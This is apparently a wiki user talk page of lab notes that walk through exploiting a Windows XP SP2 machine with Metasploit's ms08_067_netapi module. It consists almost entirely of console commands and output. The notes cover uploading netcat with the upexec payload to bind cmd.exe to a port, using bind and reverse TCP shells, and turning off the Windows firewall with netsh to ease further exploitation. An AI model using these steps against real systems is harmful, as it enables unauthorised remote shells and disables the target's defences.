User talk:Stboon

Using the NC netcat executable with upexec payload

 * 1) Using the ms08_067_netapi exploit
 * 2)          payload windows/upexec/bind_tcp
 * 3)          PEXEC path to NC.exe netcat binary
 * 1)          PEXEC path to NC.exe netcat binary

msf exploit(ms08_067_netapi) > set payload windows/upexec/bind_tcp

msf exploit(ms08_067_netapi)> set PEXEC /mnt/sdb2_removable/changes/windows-binaries/tools/nc.exe

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Exploit completed, but no session was created.

It was blocked by firewall. Using the reverse shell handler below

msf exploit(ms08_067_netapi) > set payload windows/upexec/reverse_tcp

msf exploit(ms08_067_netapi) > set PEXEC /mnt/sdb2_removable/changes/windows-binaries/tools/nc.exe

msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Sending stage (396 bytes)

[*] Sleeping before handling stage...

[*] Uploading executable (59392 bytes)...

[*] Executing uploaded file...

[*] Command shell session 5 opened (192.168.1.101:4444 -> 192.168.1.100:1044)

Cmd line:

( type in the netcat nc.exe command line parameters at this point above after the upexec stage. there was no place for specifying our to-be upload binary netcat's parameter in msf> console )

Cmd line: -l -n -e cmd.exe -p 1080 -s 192.168.1.100 -vv

Start a new shell in linux to connect to the uploaded NC

bt ~ # cd /usr/bin/

bt ~ # nc -n 192.168.1.100 1080

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

ALL THIS HAPPEN THROUGH PORT 445 with the ms08_067_netapi exploit. It wont work with firewall enabled on windows. You can get a reverse shell to upload and exec the netcat binary but it will block nc (netcat ) connection to port 1080.

A little bit about firewalls
( Using the windows/shell/bind_tcp payload )

msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp

msf exploit(ms08_067_netapi) > show options

Module options:

Name    Current Setting  Required  Description ---   ---   RHOST                     yes       The target address RPORT   445              yes       Set the SMB service port SMBPIPE BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

Name     Current Setting  Required  Description ---   ---   EXITFUNC  thread           yes       Exit technique: seh, thread, process LPORT    4444             yes       The local port RHOST                     no        The target address

Exploit target:

Id Name --    0   Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.100

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Sending stage (474 bytes)

[*] Command shell session 1 opened (192.168.1.101:48127 -> 192.168.1.100:4444)

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> ( you would get a shell if windows firewall was disabled... however...)

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[-] Exploit failed:

[*] Exploit completed, but no session was created.

( if windows firewall was enabled you would get this instead )

( Using the reverse payload instead.... )

msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp msf exploit(ms08_067_netapi) > show options

Module options:

Name    Current Setting  Required  Description ---   ---   RHOST    192.168.1.100    yes       The target address RPORT   445              yes       Set the SMB service port SMBPIPE BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_reverse_tcp):

Name     Current Setting  Required  Description ---   ---   EXITFUNC  thread           yes       Exit technique: seh, thread, process LHOST                     yes       The local address LPORT    4444             yes       The local port

Exploit target:

Id Name --    0   Automatic Targeting

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.101

msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0

[*] Started reverse handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 2 - lang:English

[*] Selected Target: Windows XP SP2 English (NX)

[*] Triggering the vulnerability...

[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1030)

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall show state

Firewall status: --- Profile                          = Standard

Operational mode                 = Disable

Exception mode                   = Disable

Multicast/broadcast response mode = Enable

Notification mode                = Enable

Group policy version             = None

Remote admin mode                = Disable

Ports currently open on all network interfaces:

Port  Protocol  Version  Program --- 137   UDP       IPv4     (null)

139   TCP       IPv4     (null)

138   UDP       IPv4     (null)

3389  TCP       IPv4     (null)

445   TCP       IPv4     (null)

2869  TCP       IPv4     (null)

1900  UDP       IPv4     (null)

C:\WINDOWS\system32>netsh firewall set opmode disable

netsh firewall set opmode disable

Ok.

(We can disable the firewall this way to facilitate other exploitation)